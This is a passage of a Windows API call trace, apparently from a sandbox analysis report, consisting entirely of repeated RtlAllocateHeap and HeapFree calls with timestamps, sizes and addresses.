returned 0 [0099.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.163] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.163] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.164] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.164] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.165] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.165] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.166] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.166] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.167] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.167] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.168] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.168] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 